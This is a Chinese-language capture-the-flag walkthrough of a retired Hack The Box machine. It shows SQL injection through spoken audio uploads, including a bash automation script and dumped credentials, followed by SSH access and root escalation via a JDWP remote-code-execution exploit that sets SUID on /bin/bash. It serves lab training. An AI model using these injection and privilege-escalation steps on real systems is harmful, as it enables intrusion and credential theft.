本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.163
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
信息枚举收集 https://github.com/codingo/Reconnoitre 跟autorecon类似 autorecon 10.10.10.163 -o ./AI-autorecon sudo nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.163 或者 sudo masscan -p1-65535,U:1-65535 10.10.10.163 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr ' ' ',' | sed 's/,$//') sudo nmap -Pn -sV -sC -p$ports 10.10.10.163
直接访问IP地址就看到一个图片页面,目录爆破
gobuster dir -u http://10.10.10.163 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -x php,txt kali@kali:~/Downloads/htb/ai$ gobuster dir -u http://10.10.10.163 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -x php,txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.163 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,txt [+] Timeout: 10s =============================================================== 2021/06/03 14:00:46 Starting gobuster =============================================================== /images (Status: 301) /index.php (Status: 200) /contact.php (Status: 200) /about.php (Status: 200) /uploads (Status: 301) /db.php (Status: 200) /intelligence.php (Status: 200) /ai.php (Status: 200)
经过测试发现访问ai.php可以上传音频文件
关于制作音频文件,可以在线制作也可以离线命令行执行,测试发现此处可以通过事先制定好的音频文件来达到sql注入的目的
在线文字转音频的网站 https://www.text2speech.org/ 不过上面的网站尝试写入注入类的单引号关键字不成功 安装flite命令制作文字转音频文件 sudo apt install flite 制作音频文件 flite -w cntfs.wav -voice rms -t "hehe" 正常查询 flite -w cntfs.wav -voice rms -t "shit open single quote" 输入单引号回显报错确认存在sql注入
下面上传音频文件的POST请求头信息,省去了音频部分乱码信息
POST http://10.10.10.163/ai.php HTTP/1.1 Host: 10.10.10.163 Content-Length: 56658 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.10.163 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNrJ4hwJy7lzCTXSZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.37 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.10.163/ai.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Connection: close ------WebKitFormBoundaryNrJ4hwJy7lzCTXSZ Content-Disposition: form-data; name="fileToUpload"; filename="cntfs.wav" Content-Type: audio/wav 从上面信息得知上传的请求参数字段存在以下几个 fileToUpload filename audio/wav
此处使用curl命令进行POST请求
curl -s -X POST http://10.10.10.163/ai.php -F 'fileToUpload=@/tmp/cntfs.wav;type=audio/x-wav' -F 'submit=Process It!' 或者 curl -s -X POST http://10.10.10.163/ai.php -F 'fileToUpload=@/tmp/cntfs.wav;type=audio/wav' -F 'submit=Process It!'
根据上面测试的结果,要进行sql注入得写一个方便快速测试执行的shell脚本,下面是代码
#!/bin/bash flite -w /tmp/cntfs.wav -voice rms -t "$1" out=$(curl -s -X POST http://10.10.10.163/ai.php -F 'fileToUpload=@/tmp/cntfs.wav;type=audio/wav' -F 'submit=Process It!' | perl -0777 -ne '/<h3>(.*)<h3>/ && print $1," ";') echo -e "${out/<br />/\n}"
保存为queryai.sh ,按照下面执行方式操作进行注入
测试sql注入是否存在 ./queryai.sh "open single quote" 枚举数据库 ./queryai.sh "open single quote space union select version open parenthesis close parenthesis comment database" 查询用户名 ./queryai.sh "open single quote space union select space username space from users comment database" 查询密码 ./queryai.sh "open single quote space union select space password space from users comment database" 下面是注入的结果 kali@kali:~/Downloads/htb/ai$ ./queryai.sh "open single quote space union select version open parenthesis close parenthesis comment database" Our understanding of your input is : ' union select version()-- - Query result : 5.7.27-0ubuntu0.18.04.1 kali@kali:~/Downloads/htb/ai$ ./queryai.sh "open single quote space union select space username space from users comment database" Our understanding of your input is : ' union select username from users -- - Query result : alexa kali@kali:~/Downloads/htb/ai$ ./queryai.sh "open single quote space union select space password space from users comment database" Our understanding of your input is : ' union select password from users -- - Query result : H,Sq9t6}a<)?q93_ kali@kali:~/Downloads/htb/ai$ 最终得到用户名和密码如下: 用户名:alexa 密码:H,Sq9t6}a<)?q93_
直接使用得到用户名和密码通过ssh登录目标靶机
sshpass -p 'H,Sq9t6}a<)?q93_' ssh -oStrictHostKeyChecking=no alexa@10.10.10.163
使用命令 ps auxww 查看进程发现下面信息
jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n
再查看目标靶机的网络连接情况
本地侦听8000,8005,8080,8009端口访问了下是tomcat ,得知存在远程命令执行漏洞,可参考:
https://www.exploit-db.com/exploits/46501
由于目标靶机是本地侦听8000端口,所以使用ssh进行本地端口转发
ssh -qNCf -L 8000:127.0.0.1:8000 alexa@10.10.10.163
然后在目标靶机上使用用户alexa执行nc localhost 8005 促使触发漏洞,然后赶紧执行远程命令exploit
python jdwp.py -t 127.0.0.1 -p 8000 --cmd 'chmod u+s /bin/bash' kali@kali:~/Downloads/htb/ai$ python jdwp.py -t 127.0.0.1 -p 8000 --cmd 'chmod u+s /bin/bash' [+] Targeting '127.0.0.1:8000' [+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4' [+] Found Runtime class: id=b8e [+] Found Runtime.getRuntime(): id=7f9ec003e830 [+] Created break event id=2 [+] Waiting for an event on 'java.net.ServerSocket.accept' [+] Received matching event from thread 0x1 [+] Selected payload 'chmod u+s /bin/bash' [+] Command string object created id:c33 [+] Runtime.getRuntime() returned context id:0xc34 [+] found Runtime.exec(): id=7f9ec003e868 [+] Runtime.exec() successful, retId=c35 [!] Command successfully executed 通过用户alexa执行bash -p 进行提权
